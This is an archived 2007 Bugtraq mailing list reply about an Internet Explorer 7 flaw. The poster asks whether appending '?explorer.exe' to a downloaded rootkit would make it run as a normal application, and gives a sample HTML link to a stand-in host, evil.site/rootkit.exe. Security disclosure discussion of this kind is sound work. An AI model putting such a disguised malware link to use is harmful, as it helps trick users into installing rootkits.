[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: RE: playing for fun with <=IE7

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: RE: playing for fun with <=IE7
From: jason.gerfen@xxxxxxxxx
Date: 15 Oct 2007 15:28:13 -0000

So to root the box just some simple social engineering is needed? I mean 
technically speaking if someone clicks a link that downloads a rootkit for 
example, then appends "?explorer.exe" or equivalent wouldn't it be executed as 
a normal application? And if your rootkit was silent installer they are now 
rooted? Right?

<a href="https://www.evil.site/rootkit.exe?explorer.exe";>click this link</a>

Prev by Date: HTML Injection Vuln in nssboard
Next by Date: RE: playing for fun with <=IE7
Previous by thread: RE: playing for fun with <=IE7
Next by thread: Re: Re: RE: playing for fun with <=IE7
Index(es):
- Date
- Thread